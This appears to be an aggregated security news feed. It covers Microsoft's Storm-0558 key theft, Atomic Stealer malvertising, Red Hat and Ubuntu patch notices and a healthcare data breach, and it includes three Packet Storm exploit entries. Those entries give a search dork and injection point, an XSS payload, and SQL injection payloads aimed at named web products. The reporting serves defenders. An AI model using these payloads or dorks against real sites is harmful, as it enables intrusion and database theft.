By Deeba Ahmed
Microsoft has shared its findings related to the Outlook breach in July in a write-up titled “Results of Major Technical Investigations for Storm-0558 Key Acquisitions.”
This is a post from HackRead.com Read the original post: Microsoft: How Chinese Hackers Stole Signing Key to Breach Outlook Accounts

In July 2023, Hackread.com reported, based on Microsoft’s findings, that Chinese hackers from the Storm-0558 ATP group had hacked European government emails. They accomplished this by using forged authentication tokens and an acquired Microsoft account (MSA) consumer signing key. Microsoft has now revealed how this breach occurred.

**RELATED ARTICLES**

*   **Chinese hackers stole a signing key from a Microsoft software dump.**

*   **The key was used to forge tokens for Outlook.com and Outlook Web Access.**

*   **The hackers gained access to email accounts of around 25 US organizations, including government agencies.**

*   **Microsoft has fixed the bugs that allowed the breach to happen.**

*   **Users should still be vigilant and take steps to protect their accounts.**

On Wednesday, Microsoft published an incident post-mortem report to explain how the Chinese threat actor Storm-0558 obtained the MSA cryptographic consumer key, forged tokens for Outlook.com and Outlook Web Access accepted by enterprise systems, and broke into US organizations accounts. 

In that breach, the Chinese spying group gained access to email accounts of around 25 US organizations, including government agencies, through exploiting a security flaw in Microsoft Cloud platform. The Washington Post reported that US State Department officials and Commerce Secretary Raimondo’s email accounts were breached in that incident.

Microsoft admitted that Storm-0558 stole the key from a software dump that crashed in April 2021. The key was leaked accidentally when the computer crashed, and the machines generated a crash dump report.

“The crash dumps, which redact sensitive information, should not include the signing key. In this case, a race condition allowed the key to be present in the crash dump,” the report read.

Microsoft explained that when this error occurred, the machine failed to redact the key from the file because of a software flaw. It also admitted that the dump shouldn’t have included the digital key in the first place.

Microsoft noted that it always isolates all the computers holding signing keys, and these machines don’t contain several key internet-based services like email or video conferencing.

However, the crash dump report created a dent in its security mechanisms because the unredacted file was passed automatically to an internet-connected Microsoft computer used to perform debugging.

The issue occured because Microsoft’s systems didn’t detect the key’s presence in the crash dump. This issue was later fixed by Microsoft and the dump was shifted from the isolated production network into its debugging environment on the “internet-connected corporate network,” as part of the company’s standard debugging process.

But the Windows giant is still figuring out how the Chinese threat actors gained access to the key. The company suspects that the group had access to an already compromised Microsoft engineer’s corporate account that provided access to the debugging environment where the crash dump was present.

It is worth noting that the signing key couldn’t be used for enterprise accounts, targeted by the hackers, because it was designed for consumer Microsoft accounts. Here Microsoft’s failure is evident.

The company didn’t update a critical software library to validate key signing signatures automatically between consumer and enterprise accounts. Its mail system developers believed that libraries performed complete validation and didn’t add necessary issuer/scope validation. This allowed the mail system to accept a request for enterprise email using a security token signed with that consumer key.

However, the company asserts that it has now fixed the bugs and processes that let the hackers carry out the breach, including improving its detection systems and preventing sensitive data from mistakenly getting added to crash dump files.

**Key Points to Understand**

*   The signing key is a digital certificate that is used to sign email messages and other Microsoft services.

*   The hackers were able to steal the key from a software dump that was created when a Microsoft computer crashed.

*   The key was not supposed to be included in the crash dump, but a software flaw allowed it to be included.

*   The hackers used the key to forge tokens that allowed them to access Outlook.com and Outlook Web Access accounts.

*   Microsoft has fixed the bug that allowed the key to be included in the crash dump.

*   Microsoft has also updated its systems to prevent sensitive data from being mistakenly added to crash dump files.

**RELATED ARTICLES**

1.  Chinese APT group spying on Vietnam military with FoundCore RAT
2.  Chinese Hackers Using Stolen Ivacy VPN Certificate To Sign Malware
3.  Chinese APT Slid Fake Signal and Telegram Apps onto Official App Stores
4.  Microsoft: Chinese APT Flax Typhoon uses legit tools for cyber espionage
5.  Chinese Smishing Triad Gang Hits US Users in Extensive Cybercrime Attack

Microsoft: How Chinese Hackers Stole Signing Key to Breach Outlook Accounts

A new malvertising campaign has been observed distributing an updated version of a macOS stealer malware called Atomic Stealer (or AMOS), indicating that it’s being actively maintained by its author.
An off-the-shelf Golang malware available for $1,000 per month, Atomic Stealer first came to light in April 2023. Shortly after that, new variants with an expanded set of information-gathering

Malvertising / Endpoint Security

A new malvertising campaign has been observed distributing an updated version of a macOS stealer malware called **Atomic Stealer** (or AMOS), indicating that it's being actively maintained by its author.

An off-the-shelf Golang malware available for $1,000 per month, Atomic Stealer first came to light in April 2023. Shortly after that, new variants with an expanded set of information-gathering features were detected in the wild, targeting gamers and cryptocurrency users.

Malvertising via Google Ads has been observed as the primary distribution vector in which users searching for popular software, legitimate or cracked, on search engines are shown bogus ads that direct to websites hosting rogue installers.

The latest campaign involves the use of a fraudulent website for TradingView, prominently featuring three buttons to download the software for Windows, macOS, and Linux operating systems.

"Both the Windows and Linux buttons point to an MSIX installer hosted on Discord that drops NetSupport RAT," Jérôme Segura, director of threat intelligence at Malwarebytes, said.

The macOS payload ("TradingView.dmg") is a new version of Atomic Stealer released at the end of June, which is bundled in an ad-hoc signed app that, once executed, prompts users to enter their password on a fake prompt and harvest files as well as data stored in iCloud Keychain and web browsers.

"Atomic stealer also targets both Chrome and Firefox browsers and has an extensive hardcoded list of crypto-related browser extensions to attack," SentinelOne previously noted in May 2023. Select variants have also targeted Coinomi wallets.

The ultimate goal of the attacker is to bypass Gatekeeper protections in macOS and exfiltrate the stolen information to a server under their control.

The development comes as macOS is increasingly becoming a viable target of malware attacks, with a number of macOS-specific info stealers appearing for sale in crimeware forums in recent months to take advantage of the wide availability of Apple systems in organizations.

UPCOMING WEBINAR

Way Too Vulnerable: Uncovering the State of the Identity Attack Surface

Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats

Supercharge Your Skills

"While Mac malware really does exist, it tends to be less detected than its Windows counterpart," Segura said. "The developer or seller for AMOS actually made it a selling point that their toolkit is capable of evading detection."

Atomic Stealer is not the only malware propagated via malvertising and search engine optimization (SEO) poisoning campaigns, as evidence has emerged of DarkGate (aka MehCrypter) latching onto the same delivery mechanism.

New versions of DarkGate have since been employed in attacks mounted by threat actors employing tactics similar to that of Scattered Spider, Aon's Stroz Friedberg Incident Response Services said last month.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Mac Users Beware: Malvertising Campaign Spreads Atomic Stealer macOS Malware

Red Hat Security Advisory 2023-5019-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.15.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:5019-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5019  
Issue date:        2023-09-07  
CVE Names:         CVE-2023-4051 CVE-2023-4053 CVE-2023-4573   
                   CVE-2023-4574 CVE-2023-4575 CVE-2023-4577   
                   CVE-2023-4578 CVE-2023-4580 CVE-2023-4581   
                   CVE-2023-4583 CVE-2023-4584 CVE-2023-4585   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.15.0 ESR.

Security Fix(es):

* Mozilla: Memory corruption in IPC CanvasTranslator (CVE-2023-4573)

* Mozilla: Memory corruption in IPC ColorPickerShownCallback  
(CVE-2023-4574)

* Mozilla: Memory corruption in IPC FilePickerShownCallback (CVE-2023-4575)

* Mozilla: Memory corruption in JIT UpdateRegExpStatics (CVE-2023-4577)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15,  
Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
(CVE-2023-4584)

* Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and  
Thunderbird 115.2 (CVE-2023-4585)

* Mozilla: Full screen notification obscured by file open dialog  
(CVE-2023-4051)

* Mozilla: Full screen notification obscured by external program  
(CVE-2023-4053)

* Mozilla: Error reporting methods in SpiderMonkey could have triggered an  
Out of Memory Exception (CVE-2023-4578)

* Mozilla: Push notifications saved to disk unencrypted (CVE-2023-4580)

* Mozilla: XLL file extensions were downloadable without warnings  
(CVE-2023-4581)

* Mozilla: Browsing Context potentially not cleared when closing Private  
Window (CVE-2023-4583)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2236071 - CVE-2023-4573 Mozilla: Memory corruption in IPC CanvasTranslator  
2236072 - CVE-2023-4574 Mozilla: Memory corruption in IPC ColorPickerShownCallback  
2236073 - CVE-2023-4575 Mozilla: Memory corruption in IPC FilePickerShownCallback  
2236075 - CVE-2023-4577 Mozilla: Memory corruption in JIT UpdateRegExpStatics  
2236076 - CVE-2023-4051 Mozilla: Full screen notification obscured by file open dialog  
2236077 - CVE-2023-4578 Mozilla: Error reporting methods in SpiderMonkey could have triggered an Out of Memory Exception  
2236078 - CVE-2023-4053 Mozilla: Full screen notification obscured by external program  
2236079 - CVE-2023-4580 Mozilla: Push notifications saved to disk unencrypted  
2236080 - CVE-2023-4581 Mozilla: XLL file extensions were downloadable without warnings  
2236082 - CVE-2023-4583 Mozilla: Browsing Context potentially not cleared when closing Private Window  
2236084 - CVE-2023-4584 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 102.15, Firefox ESR 115.2, Thunderbird 102.15, and Thunderbird 115.2  
2236086 - CVE-2023-4585 Mozilla: Memory safety bugs fixed in Firefox 117, Firefox ESR 115.2, and Thunderbird 115.2

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
firefox-102.15.0-1.el7_9.src.rpm

x86_64:  
firefox-102.15.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
firefox-102.15.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.15.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
firefox-102.15.0-1.el7_9.src.rpm

ppc64:  
firefox-102.15.0-1.el7_9.ppc64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.ppc64.rpm

ppc64le:  
firefox-102.15.0-1.el7_9.ppc64le.rpm  
firefox-debuginfo-102.15.0-1.el7_9.ppc64le.rpm

s390x:  
firefox-102.15.0-1.el7_9.s390x.rpm  
firefox-debuginfo-102.15.0-1.el7_9.s390x.rpm

x86_64:  
firefox-102.15.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:  
firefox-102.15.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.15.0-1.el7_9.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
firefox-102.15.0-1.el7_9.src.rpm

x86_64:  
firefox-102.15.0-1.el7_9.x86_64.rpm  
firefox-debuginfo-102.15.0-1.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
firefox-102.15.0-1.el7_9.i686.rpm  
firefox-debuginfo-102.15.0-1.el7_9.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4051  
https://access.redhat.com/security/cve/CVE-2023-4053  
https://access.redhat.com/security/cve/CVE-2023-4573  
https://access.redhat.com/security/cve/CVE-2023-4574  
https://access.redhat.com/security/cve/CVE-2023-4575  
https://access.redhat.com/security/cve/CVE-2023-4577  
https://access.redhat.com/security/cve/CVE-2023-4578  
https://access.redhat.com/security/cve/CVE-2023-4580  
https://access.redhat.com/security/cve/CVE-2023-4581  
https://access.redhat.com/security/cve/CVE-2023-4583  
https://access.redhat.com/security/cve/CVE-2023-4584  
https://access.redhat.com/security/cve/CVE-2023-4585  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk+ctKAAoJENzjgjWX9erE7AAQAIR+dzCTGF9i9nf0ayNsK3Pe  
Rk4TmAqX4wlOo+bjpYxezU5R8eGn7142w+zN3HZCtnGQGGrNJfJZYa58rSgLftaL  
mFT5gSNslOboKez1PU46DwMlN8umldYr+bzPMJsxLb9+H3Fk3U8WJsG/01onr+4M  
/ebTKrTPwUohKYS+qk3fM/4X/TC4Lt0qjHUR2DQuVKMRrWV+nqKirJ1sysTER8qc  
X7cpuxiPuIy1Ja0Pa/zKwCVbJr5p34aAO2zvVq3Ga757SPIJJO/X+N+SRJihRFKV  
Ac5Js5lbVK8/h9d1abUFMG2055CW2eYo0vesbyeYXoCKlT935X5uItb241rwmQFL  
iGStlIUWrX9pncpAX9ne5KJuYXi7zIUsazfVj1A1m94P8YK0aVnLFHbNLJmrNJga  
x33M0UeagROnjK13pmMI52o6aTF5E8MgUQhsLZC3kk9zW5EMSm1xlN+OuKQhTH7f  
IhatDJg6FBDAEPVAYijNeejdy/kPo8FXBPyoFDVyi5wdGyMyATqIoRG+0/8YsMlG  
MnwYs5C4bz34YOKv0V6jHvqChV/2bHNGSiW9vJEAZ6hA58SneJHwSmach5Cp7eON  
IXeIGOmVFwJMTS30jSXdWUGMPyUxqMAKxs4ayPnEURhOCjRhBvMXqtwpEIG/pz+m  
6lKd728IFmTZmFnZ11sb  
=s3dk  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5019-01

Ubuntu Security Notice 6350-1 - It was discovered that the NTFS file system implementation in the Linux kernel did not properly validate MFT flags in certain situations. An attacker could use this to construct a malicious NTFS image that, when mounted and operated on, could cause a denial of service. Zi Fan Tan discovered that the binder IPC implementation in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6350-1September 06, 2023linux-aws, linux-aws-5.15, linux-ibm-5.15, linux-oracle, linux-oracle-5.15vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-oracle: Linux kernel for Oracle Cloud systems- linux-aws-5.15: Linux kernel for Amazon Web Services (AWS) systems- linux-ibm-5.15: Linux kernel for IBM cloud systems- linux-oracle-5.15: Linux kernel for Oracle Cloud systemsDetails:It was discovered that the NTFS file system implementation in the Linuxkernel did not properly validate MFT flags in certain situations. Anattacker could use this to construct a malicious NTFS image that, whenmounted and operated on, could cause a denial of service (system crash).(CVE-2022-48425)Zi Fan Tan discovered that the binder IPC implementation in the Linuxkernel contained a use-after-free vulnerability. A local attacker could usethis to cause a denial of service (system crash) or possibly executearbitrary code. (CVE-2023-21255)It was discovered that a race condition existed in the f2fs file system inthe Linux kernel, leading to a null pointer dereference vulnerability. Anattacker could use this to construct a malicious f2fs image that, whenmounted and operated on, could cause a denial of service (system crash).(CVE-2023-2898)It was discovered that the DVB Core driver in the Linux kernel did notproperly handle locking events in certain situations. A local attackercould use this to cause a denial of service (kernel deadlock).(CVE-2023-31084)Yang Lan discovered that the GFS2 file system implementation in the Linuxkernel could attempt to dereference a null pointer in some situations. Anattacker could use this to construct a malicious GFS2 image that, whenmounted and operated on, could cause a denial of service (system crash).(CVE-2023-3212)It was discovered that the KSMBD implementation in the Linux kernel did notproperly validate buffer sizes in certain operations, leading to an out-of-bounds read vulnerability. A remote attacker could use this to cause adenial of service (system crash) or possibly expose sensitive information.(CVE-2023-38426, CVE-2023-38428)It was discovered that the KSMBD implementation in the Linux kernel did notproperly calculate the size of certain buffers. A remote attacker could usethis to cause a denial of service (system crash) or possibly executearbitrary code. (CVE-2023-38429)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1042-oracle  5.15.0-1042.48   linux-image-5.15.0-1044-aws     5.15.0-1044.49   linux-image-aws-lts-22.04       5.15.0.1044.43   linux-image-oracle-lts-22.04    5.15.0.1042.37Ubuntu 20.04 LTS:   linux-image-5.15.0-1037-ibm     5.15.0-1037.40~20.04.1   linux-image-5.15.0-1042-oracle  5.15.0-1042.48~20.04.1   linux-image-5.15.0-1044-aws     5.15.0-1044.49~20.04.1   linux-image-aws                 5.15.0.1044.49~20.04.32   linux-image-ibm                 5.15.0.1037.40~20.04.9   linux-image-oracle              5.15.0.1042.48~20.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6350-1   CVE-2022-48425, CVE-2023-21255, CVE-2023-2898, CVE-2023-31084,   CVE-2023-3212, CVE-2023-38426, CVE-2023-38428, CVE-2023-38429Package Information:   https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1044.49   https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1042.48   https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1044.49~20.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1037.40~20.04.1 https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1042.48~20.04.1

Ubuntu Security Notice USN-6350-1

Categories: News
An investigation by Microsoft has finally revealed how China-based hackers circumvented its highly isolated and restricted production environment in May 2023.



(Read more...)




The post How Microsoft's highly secure environment was breached appeared first on Malwarebytes Labs.

An investigation by Microsoft has finally revealed how China-based hackers circumvented the protections of a "highly isolated and restricted production environment" in May 2023 to unlock sensitive email accounts belonging to US government agencies.

The attack was first reported by Microsoft in July, in an article that left some important questions unanswered. The original article revealed that China-based hackers—dubbed Storm-0558 in accordance with Microsoft's new threat actor naming scheme—had gained access to email accounts "affecting approximately 25 organizations in the public cloud including government agencies as well as related consumer accounts of individuals likely associated with these organizations." Ars Technica describes those government accounts as "belonging to the US Departments of State and Commerce."

The accounts, Microsoft says, were accessed using forged authentication tokens:

> Microsoft investigations determined that Storm-0558 gained access to customer email accounts using Outlook Web Access in Exchange Online (OWA) and Outlook.com by forging authentication tokens to access user email. 

Authentication tokens are the computer equivalent of the wristband you get at a concert, or the lanyard you're issued at a cybersecurity conference. You show your ticket once, and in return you're given a wrist band or lanyard that you have to keep on display at all times to show you belong.

In the case of Outlook.com, your username and password are the ticket that gets you through the door, and the authentication token is the lanyard you're given that says you're allowed to be there.

An attacker with your authentication token can pretend to be you without knowing your password, so tokens need to be hard to forge. To ensure they are, they're backed by cryptography that hinges on a private cryptographic key that has to be kept very, very, very secure indeed.

The original Microsoft article noted that Storm-0558 "used an acquired \[Microsoft account\] key to forge tokens to access OWA and Outlook.com" but, crucially, did not say how the attackers were able to get at a key that would have been held in something like a real life version of the Fort Knox-like production environment, described by Microsoft as follows:

> Microsoft maintains a highly isolated and restricted production environment. Controls for Microsoft employee access to production infrastructure include background checks, dedicated accounts, secure access workstations, and multi-factor authentication using hardware token devices. Controls in this environment also prevent the use of email, conferencing, web research and other collaboration tools which can lead to common account compromise vectors such as malware infections or phishing, as well as restricting access to systems and data using Just in Time and Just Enough Access policies.

Microsoft provides an answer—what it calls the "most probable mechanism"—to the riddle of how attackers breached all that protection, in its September 6 update.

It starts with a crash in a consumer signing system in 2021. A "crash dump" of the system, which included the key, was moved from the highly secure production environment into Microsoft's debugging environment so that the cause of the crash could be investigated.

At some point after this occurred, Storm-0558 compromised a Microsoft engineer’s corporate account. That account had access to the debugging environment containing the crash dump with the key, and Storm-0558 was able to retrieve it from there without having to tackle the extensive security of the production environment.

Crucially, mechanisms that should have redacted the key material during the crash dump failed.

As you'd expect, Microsoft explains that it's gone to great pains to beef up its security as a result, with numerous improvements in the way it handles and detects key materials, among other improvements.

The attack is a great example of just how advanced and persistent Advanced Persistent Threat (APT) actors can be, and why what Microsoft calls an "'assume breach' mindset" is so important in modern security. Computer networks are complicated and constantly in flux, and any organization can be breached. Assume you have been breached and monitor your environment accordingly.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

How Microsoft's highly secure environment was breached

JPC2 CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ======================================================================================================================================| # Title     : JPC2 CMS v1.0 Sql injection Vulnerability                                                                            || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                              || # Vendor    : https://www.facebook.com/JPC2GroupWeb                                                                                |  | # Dork      : "Web design and development JPC2 Group Web"                                                                          |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  inject here : http://127.0.0.1/wwwnpmlexcom/en/pagina.php?idcate=13[+]  Panel       : http://127.0.0.1/wwwnpmlexcom/en/administrador/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

JPC2 CMS 1.0 SQL Injection

Izdelava IDS version 2.0 suffers from a cross site scripting vulnerability.

**Izdelava IDS 2.0 Cross Site Scripting**

Posted Sep 7, 2023

Authored by indoushka

Izdelava IDS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 0ef798585da30c6f8445d7bd8186a6b3603ee0ca8ce5383bd27b385d754bf05c

Download | Favorite | View

**Izdelava IDS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Izdelava IDS v2.0 XSS Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://studiointera.net                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /preview.php?id=9'<script>alert(/indoushka/);</script>[+] http://127.0.0.1/gspostojnanet/vnosi/cms/preview.php?id=9%27%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,139)
*   Arbitrary (16,235)
*   BBS (2,859)
*   Bypass (1,743)
*   CGI (1,027)
*   Code Execution (7,289)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,499)
*   Encryption (2,370)
*   Exploit (52,056)
*   File Inclusion (4,227)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,791)
*   Intrusion Detection (892)
*   Java (3,049)
*   JavaScript (859)
*   Kernel (6,717)
*   Local (14,491)
*   Magazine (586)
*   Overflow (12,701)
*   Perl (1,423)
*   PHP (5,152)
*   Proof of Concept (2,343)
*   Protocol (3,604)
*   Python (1,535)
*   Remote (30,843)
*   Root (3,588)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,893)
*   Shell (3,192)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,208)
*   SQL Injection (16,403)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,811)
*   Web (9,691)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,988)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,828)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,638)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,823)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,885)
*   UNIX (9,305)
*   UnixWare (186)
*   Windows (6,582)
*   Other

Izdelava IDS 2.0 Cross Site Scripting

Meeting Room Booking System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    ## Title: Meeting Room Booking System-1.0 Multiple - SQLi## Author: nu11secur1ty## Date: 09/06/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/meeting-room-booking-system/#sectionDemo## Reference: https://portswigger.net/web-security/sql-injection## Description:The column parameter appears to be vulnerable to SQL injectionattacks. The payload ' was submitted in the column parameter, and adatabase error message was returned. The attacker easily can steal allinformation from the database of this web application!WARNING! All of you: Be careful what you buy! This will be your responsibility!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: column (GET)    Type: error-based    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)    Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(SELECT6118 FROM(SELECT COUNT(*),CONCAT(0x716a717171,(SELECT(ELT(6118=6118,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&direction=ASC&page=1    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind - Parameter replace    Payload: controller=pjFront&action=pjActionRooms&locale=1&index=2467&column=(CASEWHEN (6735=6735) THEN SLEEP(5) ELSE 6735 END)&direction=ASC&page=1---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Meeting-Room-Booking-System-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/meeting-room-booking-system-10-multiple.html)## Time spent:01:47:00

Meeting Room Booking System 1.0 SQL Injection

By Waqas
IBM, a service provider to Johnson & Johnson Health Care Systems, Inc., has notified customers and users of…
This is a post from HackRead.com Read the original post: IBM Notifies Janssen CarePath Customers of Data Breach

*   **Janssen CarePath data breach exposed names, contact info, insurance info, and medication data.**

*   **IBM disabled a “technical method” used to gain unauthorized access.**

*   **Complimentary 1-year credit monitoring is offered.**

*   **Janssen CarePath users should monitor account statements.**

*   **Data breach is a reminder to protect personal info.**

IBM, a service provider to Johnson & Johnson Health Care Systems, Inc., has notified customers and users of the Janssen CarePath patient support platform of a data breach that may have exposed personal information.

The breach involved unauthorized access to a database used by Janssen CarePath. The information that may have been compromised includes individuals’ names and one or more of the following: contact information, date of birth, health insurance information, and information about medications and associated conditions. Social Security numbers and financial account information were not contained in the database or affected.

IBM said that it was notified of the issue by Janssen on August 2, 2023 and that it promptly worked with the database provider to disable the technical method that was used to gain unauthorized access. IBM also augmented security controls to reduce the chance of a similar event occurring in the future.

While there is no indication that any of the involved information has been misused, a complimentary one-year credit monitoring service is being offered to individuals whose information may have been involved. Individuals can arrange for credit monitoring by following the instructions in the notification letters that they receive or by calling the dedicated call center.

Janssen CarePath users are encouraged to remain vigilant by regularly reviewing their account statements and explanations of benefits from their health insurer or care providers with respect to any unauthorized activity and to promptly report any suspicious activity.

In response to the news, William Wright, CEO of Closed Door Security told Hackrad.com that, “IBM hasn’t provided information around how the database was accessed, however, by saying it identified a ‘technical method’, this sounds like it could have been via an unpatched vulnerability, or a failure to properly secure the database against external access.”

“Organisations must run regular pen tests on their assets to identify unpatched vulnerabilities and to spot network blind spots that could be exploited by adversaries. These security assessments must be attack-driven, where all the different routes an attacker could take to infiltrate the network are tested and sealed. Otherwise, as we are seeing here, it won’t be long before an adversary identifies and exploits them,” William added.

“IBM is clearly still investigating the incident, but the data potentially exposed could be a gold mine for attackers. Healthcare data is the most valuable information on the dark web, so attackers have multiple ways to monetise from it – either by selling it or exploiting victims further,” he wanted. “IBM must communicate with those impacted as a matter of urgency because they need to be on guard for further attacks.”

The data breach is the latest in a series of high-profile security incidents affecting healthcare organizations. In recent months, there have been data breaches at Apria, LabCorp, Quest Diagnostics, and Anthem.

The Janssen CarePath data breach is a reminder of the importance of data security in the healthcare industry. Healthcare organizations should take steps to protect patient data, including implementing strong security controls and conducting regular security assessments.

IBM Notifies Janssen CarePath Customers of Data Breach

ColdFusion version 2021 update 1 (and earlier) and versions 2018.10 (and earlier) are impacted by an improper access control vulnerability when checking permissions in the CFIDE path. An authenticated attacker could leverage this vulnerability to access and manipulate arbitrary data on the environment. 

Security updates available for Adobe ColdFusion | APSB21-75

**Summary**

Adobe has released security updates for ColdFusion versions 2021 and 2018. These updates resolve multiple critical  vulnerabilities that could lead to security feature bypass.   

**Affected Versions**

Update 11 and earlier versions      

Version 1 and earlier versions

**Solution**

Adobe categorizes these updates with the following priority rating and recommends users update their installations to the newest versions:

**Product**

**Updated Version**

**Platform**

**Priority rating**

**Availability**

